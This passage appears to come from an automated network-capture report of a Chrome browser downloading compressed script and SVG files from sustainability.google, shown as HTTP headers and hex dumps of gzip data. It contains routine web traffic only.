                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC722INData Raw: 4e 5a f3 dc d2 53 6a 1c ca 2d 50 50 30 c5 68 8f 63 01 8f a6 41 ec bc 28 d6 e0 c5 21 87 87 90 ab 45 0c 7a 84 b2 f2 6a bb 19 bc 96 3c e6 89 cb 94 df 05 df c9 3a 6a 3c f5 98 cf db 36 ef ee d6 cb dd f6 ea dd fa cd 57 9b f7 1f ca 65 89 4c 1d 04 2a d5 e0 3d 0c 12 25 c5 b2 76 88 04 ed 24 42 13 98 70 b0 f4 cb 2f 5a 3b 46 b1 6d c3 ff 59 aa 0c f8 64 d4 da a3 38 13 5a 06 f2 70 7a 6f 95 bb bd 09 50 d0 01 2d 2a a1 40 b4 7a c4 5b 2a 81 66 93 02 06 3c e6 84 b8 44 32 57 a5 68 96 8c 5a e2 a7 54 84 7f 56 63 4f 22 8c ce 0b f2 1e da 31 a6 6e c8 e7 f4 03 9c 66 1c fd e1 eb b0 92 25 70 4d 2e 2e dc 3c e0 38 a1 a9 53 f6 27 2e 63 76 30 06 32 53 42 26 40 03 de 07 8a 91 ba 61 9d 28 15 99 15 15 0c e2 95 8b e6 fe f4 ea ca e1 b7 95 54 d3 6a 0b e5 4a 9e 9c 13 9a 94 10 39 94 07 28 60 05
                                                                                                                                                                                                                                                                                          Data Ascii: NZSj-PP0hcA(!Ezj<:j<6WeL*=%v$Bp/Z;FmYd8ZpzoP-*@z[*f<D2WhZTVcO"1nf%pM..<8S'.cv02SB&@a(TjJ9(`
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          127192.168.2.749993216.239.36.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC649OUTGET /static/index.min.js?cache=47ade0f HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 74f66772ae221e446bd66548ccdbd269
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:34:04 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:44:04 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 468
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC695INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 66 66 63 0d 0a 00 00 00 00 02 ff bc 7d 69 7b 5a c7 96 ee 77 fd 0a 4c 9f 56 e0 68 0b 4b 76 ce e9 34 98 e8 41 08 d9 24 92 50 04 4a e2 ab f6 c3 dd c0 46 10 31 19 90 6d 45 d6 7f bf ef 1a 6a d8 03 92 9c 73 fa f6 e0 88 da 35 ae 5a b5 e6 5a 55 18 de ce fa eb f1 7c 56 e8 76 3f 2f fa fd e2 fd 77 b7 ab 28 b7 5a 2f c7 fd f5 77 15 29 2c 45 55 f3 c7 d7 af f7 0f b6 b4 b4 ea cf 17 51 d5 2f e9 2f a3 70 1d 75 a2 e9 62 42 ff 0d af 8f c7 cb d5 ba b6 bc ae da 81 c2 e2 fd 32 5a df 2e 67 b9 b0 b4 0c 3f 57 43 af c3 8d cd 7f 1b af 47 17 a8 ec 7a 09 7a c5 7b e9 a0 57 31 fd 79 3d 85 cb 65 78 d7 5c 47 cb 70 3d 5f 36 31 1d
                                                                                                                                                                                                                                                                                          Data Ascii: 0000000100000001000000010000000100ffc}i{ZwLVhKv4A$PJF1mEjs5ZZU|Vv?/w(Z/w),EUQ//pubB2Z.g?WCGzz{W1y=ex\Gp=_61
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: d3 b5 d9 89 17 0d 1e 56 40 15 3e 54 fb 82 cf 66 31 20 6c 6e 67 af a3 f5 db c9 bc 17 c6 e9 50 58 bd ca 0b cc 1d 38 af b9 5a 67 34 5e 6d 6f bb bf 83 30 48 d5 fc 3c 9e 0d e6 9f b7 b7 e5 bf e9 ef ab 68 32 dc de a6 7f d3 df a4 67 33 c2 87 8a 3d b5 a0 8a 8e f8 55 76 76 40 66 e9 34 f7 ab b4 c4 0a 60 d3 df de ee 97 4e c3 f5 a8 5a a5 7f 0d 0c fa 0f eb d1 72 fe 39 d7 58 2e 41 00 f2 f5 70 36 9b af 73 20 4e 83 9c 8c 95 d3 85 16 2b de 06 cb 27 b7 b1 16 4c 85 35 00 50 74 e7 af d9 ee b6 df 9f 1e b6 4e f4 fc 55 7d 44 34 98 68 68 5f 7e c5 44 10 30 8d 7f 29 e4 bf e4 bd 3e 3b 17 97 ed 0e 4e fa 3f fd f3 66 69 6f ea 2c 7e fd ea 7d 8b cf c6 db e8 c5 7c 72 37 1c 4f 26 ab 18 5f 04 ca 30 0a 77 e6 e7 fa 5d e6 1a ab 64 68 02 4e 76 e3 b8 f9 7b 35 ff b7 3f 56 fd c5 df f2 0e 0a a6 73
                                                                                                                                                                                                                                                                                          Data Ascii: V@>Tf1 lngPX8Zg4^mo0H<h2g3=Uvv@f4`NZr9X.Ap6s N+'L5PtNU}D4hh_~D0)>;N?fio,~}|r7O&_0w]dhNv{5?Vs
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: 06 58 0a be 42 f2 18 48 85 98 ba d3 61 16 95 31 0f a9 5a c6 12 79 d4 14 a0 ff 1a 50 79 f2 d0 90 6f af 47 c7 72 70 0e 27 f3 fe 8d 4f c4 15 ce 19 53 92 95 ff bb a7 c4 1b ea 81 84 38 58 6a c9 c6 ba 2a 72 02 a6 f0 dc 03 6a a8 4c 62 80 d0 b1 ec 84 15 8e 45 33 d8 19 d4 58 98 75 e8 1e a5 bd 90 18 d8 3e c1 46 46 1c 7d 10 3f 1f 65 d5 3a 13 64 ac 90 f9 95 b2 5b d7 2e 46 21 43 69 c7 1d 16 4c 57 bd e7 62 9f ec 9f 07 89 0c 40 fb 76 f0 c7 30 59 4f c1 6c e0 ba cb e8 0d 67 26 8b 79 65 50 2d a8 01 24 6f 6d 42 4a 8b 14 31 fa 02 29 41 b8 03 ab d4 6c ac 29 25 ce 05 a4 9d 67 d2 1b 08 11 fe e8 6e 5d e6 90 c6 87 8e 33 15 cb 6b c2 af 5f 9f 4b a9 27 51 f8 29 ea 2c ef f8 04 7a c3 d9 b5 fa 67 3e 14 32 10 9f 43 8f 07 7b 1e 84 a1 56 41 e6 20 18 27 c7 d3 7d 8b 77 4d eb 80 91 84 f1 30
                                                                                                                                                                                                                                                                                          Data Ascii: XBHa1ZyPyoGrp'OS8Xj*rjLbE3Xu>FF}?e:d[.F!CiLWb@v0YOlg&yeP-$omBJ1)Al)%gn]3k_K'Q),zg>2C{VA '}wM0
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC642INData Raw: 61 10 0c 5d 60 6b 2f 81 af 8e ac 26 f7 cd 06 8a c6 37 30 be 98 b0 2a 1b 53 d0 0d 72 8d 5c 1c 4f af 9a e7 d0 b9 5c 73 b6 fe 41 fe ba 1c c7 ff 84 ff 6d ba 88 06 b6 da fe 3f 5d 3d f3 37 5a bf 7e e5 8a cd df c7 93 79 68 3f f0 8f 7f 7e cf b5 f2 26 a6 28 97 2f 22 f0 74 af d2 87 81 44 f5 e5 be 89 7d 19 b8 93 24 31 1a 57 e4 16 fc 50 c9 8a 25 83 6b d1 15 bf 30 71 64 03 b7 9d 88 30 f2 18 5b 02 7d bc 7a cf 0b 2b 32 27 05 f1 12 49 92 3e d6 10 5e 90 64 89 39 70 11 13 61 32 ca 99 f1 16 74 13 78 a8 dd 84 0f c1 56 36 31 4c f5 1b 23 f6 f0 d7 13 83 22 9f 43 3a 72 d8 d5 b4 d3 65 39 c4 1c cd 98 d6 ef 50 4d 59 64 1c c5 cc ca 41 23 cc 49 85 56 b7 86 09 42 0d bd 60 a8 70 b1 76 63 ee c8 f9 ac 1d ad d7 93 68 50 87 0b b2 17 c2 8f c2 56 1c 3e e7 f0 ff 45 14 c6 8a 43 2b 56 35 1c 74
                                                                                                                                                                                                                                                                                          Data Ascii: a]`k/&70*Sr\O\sAm?]=7Z~yh?~&(/"tD}$1WP%k0qd0[}z+2'I>^d9pa2txV61L#"C:re9PMYdA#IVB`pvchPV>EC+V5t
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 5f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 69 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 60 0d 0a 30 30 30 30 30 30 30 31 0d 0a 72 0d 0a 30 30 30 30 30 30 30 31 0d 0a 52 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31 0d 0a 11 0d 0a 30 30 30 30 30 30 30 31 0d 0a 75 0d 0a 30 30 34 66 66 36 0d 0a 59 7f 76 e6 dd 62 20 34 c4 7d 21 8a d2 45 4f b1 19 bb 06 6e 92 82 d5 37 74 2c 81 d3 62 95 96 ce 44 7c 76 41 44 f9 9a 51 5b 72 7d 09 bd d6 fe 72 eb 79 0e b1 42 08 02 c7 89 aa b0 a7 13 07 25 4e 84 a4 63 e0 2a 28 6a 3b 9c 46 b5 95 1e f7 2e 08 11 b7 41 ec d6 ea f3 98 c2 b2 28 bc 08 b7 2d 30 b3 7e 88 28 1f 13 94 5e 16 a8 d0 ee be a8 de 54 7a a0 b0 37 b9
                                                                                                                                                                                                                                                                                          Data Ascii: 00000001_00000001i0000000100000001:00000001`00000001r00000001R000000010000000100000001u004ff6Yvb 4}!EOn7t,bD|vADQ[r}ryB%Nc*(j;F.A(-0~(^Tz7
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: bd d2 47 55 68 6c 30 07 99 fc 3d bb fd 65 1b 37 c9 2f 5a bf bf ef c2 64 c4 77 60 eb ad 33 fc 79 5a 3b c3 1d f3 fa bb 46 fd e7 f8 e5 73 ba 26 eb 55 71 c4 e0 39 3d 79 86 d2 47 00 07 fb 5b 96 81 fa 37 a8 92 a7 e1 22 be 61 e6 d4 c2 72 66 ec 0e 64 d0 2f 4c 77 f8 56 b2 bd d9 b7 b3 5f f4 6c 4d 84 53 a8 be 89 94 2d 9c 19 7b 8d c4 05 1e 0d 13 a2 56 5c 57 95 94 89 0f 1d b2 4b 61 8d e0 c0 60 7d b5 0f e4 7b b0 93 22 6b 20 86 7a 01 7c 7a a1 7b be 8a c2 89 11 82 71 81 02 3c 9a f0 62 61 50 82 3e 17 70 55 0e b4 d4 6b c0 25 c2 a8 c3 c2 d5 d5 22 78 f5 21 b8 5a 07 af 3f 40 e2 42 ff af 5e 54 3f 96 80 28 58 d3 d7 af af cd 0f f0 65 41 14 48 fa 1f 4b 83 08 b7 2b 22 d4 c0 df 3c df e0 7b 8b 2a 1f 89 40 e0 d3 f6 f6 f7 55 ed c9 5a 3a eb 86 aa 10 e2 d8 85 0d b0 30 f7 8b 81 49 cb 00
                                                                                                                                                                                                                                                                                          Data Ascii: GUhl0=e7/Zdw`3yZ;Fs&Uq9=yG[7"arfd/LwV_lMS-{V\WKa`}{"k z|z{q<baP>pUk%"x!Z?@B^T?(XeAHK+"<{*@UZ:0I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: e1 46 c9 9e c0 7f 1a 61 7f e4 56 c8 67 dc 70 25 c8 1b c4 cc 14 0c 44 3d c1 a6 1c 05 35 6c ea a3 a1 95 58 36 df 07 58 04 1f c1 a1 f0 0f 29 a8 e8 21 0e 84 8c d8 62 60 81 46 18 99 c1 98 b6 50 38 80 02 7c 98 30 87 38 75 dd 88 5d 94 6f 8f 03 b2 dc 62 24 39 85 af 33 49 18 1c 59 6e 76 20 b5 88 2a 81 98 ad 60 00 3f 30 c2 d7 24 f0 c8 ee aa 28 86 b0 74 c0 76 a4 b2 88 08 81 a3 2a 4c 47 3a b5 7b 21 35 88 33 0c 42 e4 37 c2 75 84 39 67 6d 7c 40 3a 23 78 9c 65 fe 1b c4 31 20 47 06 34 4c 30 88 c1 a9 dc d0 0a ab f8 cb 32 07 67 5e e2 65 7b 30 24 2c 8b 1b 2d 14 8a 14 a3 ea ad 4e 4b 6d 8f 29 50 26 b0 dc d9 fb 28 17 d5 c6 1d 71 13 b3 7a e9 d3 b3 e1 04 78 3a a1 1e 38 4c ff 00 4e e2 2a 2e 41 ee bf a4 9f fb 2f fb 9c 76 09 69 b4 fa 28 47 8e 1b 17 38 ba 21 d0 36 09 95 f1 ac 3f b9
                                                                                                                                                                                                                                                                                          Data Ascii: FaVgp%D=5lX6X)!b`FP8|08u]ob$93IYnv *`?0$(tv*LG:{!53B7u9gm|@:#xe1 G4L02g^e{0$,-NKm)P&(qzx:8LN*.A/vi(G8!6?
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: 20 d8 79 02 d3 13 5d 4a 2e 2c 4b f5 93 66 fd 67 35 83 71 18 2c cf 1a 8b be 89 2f 5a 09 c6 de 9b 3f 42 a4 61 9a 40 20 70 87 d5 a9 8b 21 f2 de 23 52 33 5a 81 e8 82 1a 08 c3 7f 08 26 f1 be 18 80 90 07 62 98 5b c3 eb 00 10 a1 17 b7 30 f3 06 5b 94 a4 2b fd 39 c4 27 12 24 d2 5f 28 31 61 88 a8 47 54 40 32 e7 8c 0a 08 4f c7 01 c1 67 08 1b 19 9f 05 d9 f0 f9 26 f3 f3 78 88 9b aa f0 59 22 6a 35 a3 f5 77 57 4b 84 de 56 f3 da 09 72 14 cf d7 05 5e 0a a2 84 f0 27 1e 3d a0 ff 98 39 ca 2f 99 90 fc 2d 0d e5 6f 19 aa f8 1d c8 6a f6 58 c8 16 cd 0e 8e 6a 7e 2f 2f 43 25 86 d7 7e 08 94 f2 e7 5f 1c 5f b6 fc ea 03 dd 60 85 fd da 59 ab 43 ba 13 66 9f 3d 40 2c 3a 76 db 65 11 4e 7f ed 3f fa d5 cf 4d 9c 6e 3b 04 32 58 86 9a fe 8c c4 0d 8f 7c 45 e0 d8 23 5f 67 8f 7e a5 d0 c6 60 1a 47
                                                                                                                                                                                                                                                                                          Data Ascii: y]J.,Kfg5q,/Z?Ba@ p!#R3Z&b[0[+9'$_(1aGT@2Og&xY"j5wWKVr^'=9/-ojXj~//C%~__`YCf=@,:veN?Mn;2X|E#_g~`G
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: 83 47 8f cb 2d 4b f6 ed cf e3 45 04 09 02 c7 5a 48 2d 9c ee 29 cc 92 68 8c 04 ba 90 f4 14 80 1e e8 a5 ff 38 02 38 04 a6 fb ce e4 7d 54 bd 40 79 a6 67 36 ea d3 13 05 b4 74 52 ef 48 42 5c 15 3e 95 ea b5 8b a3 b6 86 b6 7d 52 0d c3 6b 13 d3 bb d9 d4 f4 09 96 a6 c6 6f e7 ad 8b 8e 09 88 8b 9f ee 27 1a 9f 34 db f1 86 fa 28 1a b9 c1 44 2f 48 52 8b d8 14 d8 66 00 83 d7 d6 a7 52 b3 d3 38 85 ac c6 c4 5d da 20 87 d3 86 de b4 da 2c 21 c9 6e b0 be 7c 2a 9d d5 7e 6d be 65 91 5f 5b 12 73 80 f4 f3 c4 e2 54 cc 62 a1 49 26 46 ce b0 67 b7 63 f1 4c da 29 5f 35 71 77 72 6f c4 3c 6f 91 f9 0b 77 41 3e 23 30 9f 2f bf af 8a 70 2c 8b a2 03 4a 76 04 b9 aa b6 5e 2f 57 24 da 32 b8 e6 bd 55 b4 44 8a 59 56 62 a7 61 e1 5e 05 eb 36 6d a5 44 5c 59 c6 ee 09 d5 30 fc 72 73 38 63 17 88 dc 46
                                                                                                                                                                                                                                                                                          Data Ascii: G-KEZH-)h88}T@yg6tRHB\>}Rko'4(D/HRfR8] ,!n|*~me_[sTbI&FgcL)_5qwro<owA>#0/p,Jv^/W$2UDYVba^6mD\Y0rs8cF
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: d7 63 06 75 fa e8 48 c4 a6 1d 33 73 7b 1b 9f 9b 8b 77 c2 91 73 ce 3c ab 50 21 13 30 f2 24 d3 81 1f 91 73 c7 8a dd 3d 18 fc 96 c0 8d eb bb ed ed ab 3c fe 1e c3 2d 1f e4 11 a9 b5 8a f2 1f 9c 41 db d5 03 0b 47 a8 8c 69 55 35 6d fc a8 27 e7 22 8e 5d 3b d3 58 4a 10 cb 15 9c 0d e4 bd 47 6e 2d be 79 57 79 31 93 bb 77 ae 08 99 18 91 33 83 23 a1 2b 3c e5 9e 4c 7f 6a d2 82 d2 5a 16 d5 1e 6e d1 92 64 e0 6e 4f 9a e0 a8 85 5c 69 84 15 2b b7 a0 d8 ab 05 ae 30 d2 a5 40 9b 8e ae f7 30 95 d9 cf ae 91 58 c1 36 db de de 7b b3 50 63 d9 c1 8b 3d ba 6e 83 d6 53 4f 55 a1 31 f5 be a4 f5 67 c7 16 3a a4 0a b8 83 67 2e 16 56 5e 2c 64 79 ae 88 72 12 e8 2d 43 26 c3 6b 5e 09 ee c9 61 73 fa 07 1f 61 a6 e7 2b 1d b2 4f d0 a2 67 b8 34 5a 4e 2f 92 ae ad e3 66 08 ee ac 8b 7c 44 97 c4 70 67
                                                                                                                                                                                                                                                                                          Data Ascii: cuH3s{ws<P!0$s=<-AGiU5m'"];XJGn-yWy1w3#+<LjZndnO\i+0@0X6{Pc=nSOU1g:g.V^,dyr-C&k^asa+Og4ZN/f|Dpg


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          128192.168.2.750001216.239.38.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC365OUTGET /static/img/icons.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC711INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 2e0294217567e7ff956b063fa64f4afa
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:05 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:50:05 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 107
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC697INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 31 0d 0a 00 0d 0a 66 38 39 0d 0a 00 00 02 ff c4 9a cb 6e 5b 47 12 86 5f e5 40 d9 24 0b 1e f7 fd 32 b0 03 64 66 a3 45 0c cc 2a 0b 6d 02 0e 4d 99 42 48 cb 90 14 3a 33 4f 3f df 5f 4d 4a 94 65 cb e3 24 98 c0 62 f3 b0 2f d5 d5 d5 75 f9 ab 8e 5f de ee df 4e bf ed b6 ef 6e 5f 9d 6d ee ee de ff ed c5 8b 0f 1f 3e cc 1f e2 7c 7d f3 f6 45 70 ce bd 60 c6 d9 f7 2f df ac 2f 6f bf 7f a9 d9 57 6f 5e 9d dd ae 97 37 ab cd e2 c3 e6 ea 6e 7d 36 ed af d6 1f fe 7e fd db ab 33 37 b9 29 25 fe 58 f0 76 5a 6d af de 2f de 2f ef 36 af ce 7e bd d9 7e fb 8d 7e bb 9f 4b 0f 3f 7b 57
                                                                                                                                                                                                                                                                                          Data Ascii: 000000010000000100000001000000010000000100001f89n[G_@$2dfE*mMBH:3O?_MJe$b/u_Nn_m>|}Ep`//oWo^7n}6~37)%XvZm//6~~~K?{W
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: a7 ad cd 1d 2b c6 3e a2 d7 4f 36 38 6c 36 b6 3f 61 c8 36 c3 d8 6d cb bd 6f f8 89 b6 09 d8 67 dc 8f d5 ab b9 d7 b0 88 73 8a 65 4a 58 6c 83 0f 44 6e 2c d0 dd 7b de 8e c5 63 f7 2f dd c2 7e bd b9 42 53 9f bb 87 f8 29 95 2e a5 fc de bb 78 1d e1 b8 a1 61 15 51 f5 a5 e7 70 01 09 a8 35 4f 28 15 c6 13 fa d9 c7 7a 1e 70 73 7d b5 c0 cf c4 c9 d1 17 53 9e 53 8d 63 0e ab 98 f3 a3 3c 6d 42 20 75 df f1 7a 48 03 9f c8 48 c0 dd 71 65 ba 6e 9e 37 f6 bc 9a 8b fc d3 18 c0 21 3b 7c a1 e6 68 b7 50 f6 f6 95 36 3e e2 33 13 5e cf 87 f4 09 8a 27 04 c3 97 08 f6 1f 1f 4e 5b e5 1d e3 8c e6 79 dc 63 d3 c9 ab 38 55 3b 9c a4 a4 80 a3 47 3c f8 ef c5 dc 59 5b 93 3c 73 69 d2 d7 e3 60 bb b5 67 42 85 b4 8e 5e b5 ad 89 55 96 20 ac 64 64 d1 8d 93 d1 8b 9d 0f 73 08 08 f9 ff be b1 9d da d4 bf 04
                                                                                                                                                                                                                                                                                          Data Ascii: +>O68l6?a6mogseJXlDn,{c/~BS).xaQp5O(zps}SSc<mB uzHHqen7!;|hP6>3^'N[yc8U;G<Y[<si`gB^U dds
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: 4f d8 60 14 91 c3 aa 44 b8 7c cd 7a 60 89 7e b1 44 de 13 94 7c 24 f2 31 3c 2e cc f6 66 50 c5 e8 33 5d 82 96 80 05 c4 4c d6 1c d6 18 ab 12 73 90 0b 1e 5f f7 62 1c 94 6d db 96 ef bf c6 b0 b6 34 81 64 5d 61 4a 1c 82 9b 3e 6e 6a 12 96 e7 cf 17 52 53 f4 c1 05 6c b2 8f da 96 15 45 1c 96 a8 ba 98 21 a2 2c d0 ea 22 eb 5d 14 8a 04 59 09 d4 92 e3 8f 67 99 39 6b 45 5f 70 cb 79 2b 0a a0 06 f7 c3 5c e1 3d 05 2d b5 91 8c 7f 3a ec 40 54 91 06 23 55 fc 17 b8 1c 71 38 d0 f8 20 2c 2a 1a d7 e6 46 85 0e e2 95 38 18 ec 15 63 55 d7 26 22 ca ee 9c 17 f8 8e 68 dd 98 0b 21 5b 2a c1 3b 04 a7 b5 f1 61 0c ee 6d de c5 0e 1f e8 6a 50 d5 a2 51 dc 33 6e c8 0f 44 10 66 a2 e9 97 8b fe 56 fc 8f bc c1 8a 0b 7a b6 61 f3 c4 0d 90 6f 2b e0 40 e8 fa 30 8a 21 b1 b9 09 82 24 02 bc 3f 96 92 61 de
                                                                                                                                                                                                                                                                                          Data Ascii: O`D|z`~D|$1<.fP3]Ls_bm4d]aJ>njRSlE!,"]Yg9kE_py+\=-:@T#Uq8 ,*F8cU&"h![*;amjPQ3nDfVzao+@0!$?a
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC546INData Raw: c8 e7 f4 03 9c 66 1c fd e1 eb b0 92 25 70 4d 2e 2e dc 3c e0 38 a1 a9 53 f6 27 2e 63 76 30 06 32 53 42 26 40 03 de 07 8a 91 ba 61 9d 28 15 99 15 15 0c e2 95 8b e6 fe f4 ea ca e1 b7 95 54 d3 6a 0b e5 4a 9e 9c 13 9a 94 10 39 94 07 28 60 05 04 70 98 22 3e d0 d2 03 3d bc 22 61 20 52 d5 a7 58 2e 2d 26 6b 00 06 68 5b 43 2f 55 bc a3 fc c0 8f 64 45 72 b5 76 0a e8 c9 81 d4 d6 ce f5 1f 2b 1a 36 54 40 1a 90 18 45 3c bd 68 8b 48 37 39 33 1e 15 f1 cc 3b dc d7 4e c9 0f c1 85 fc 7f 0c 98 a9 5a 5d 2b 25 7a d7 71 da 2d 0f dd a5 be 07 38 a9 5d 2d 28 f1 00 b6 f1 27 40 ca 46 0c 50 16 ae e4 95 01 55 e3 d5 e3 40 66 8d 3a 95 1e 6c 50 36 47 89 47 e9 b0 fe 3b 00 fe 4b 89 52 03 64 12 99 c9 72 90 af bd 4d 56 f6 83 5d 83 18 c4 84 6e c2 a1 68 08 87 57 1e e6 bc 89 f4 cc e5 65 27 56 89
                                                                                                                                                                                                                                                                                          Data Ascii: f%pM..<8S'.cv02SB&@a(TjJ9(`p">="a RX.-&kh[C/UdErv+6T@E<hH793;NZ]+%zq-8]-('@FPU@f:lP6GG;KRdrMV]nhWe'V
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          129192.168.2.750002216.239.38.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC370OUTGET /static/img/glue-icons.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
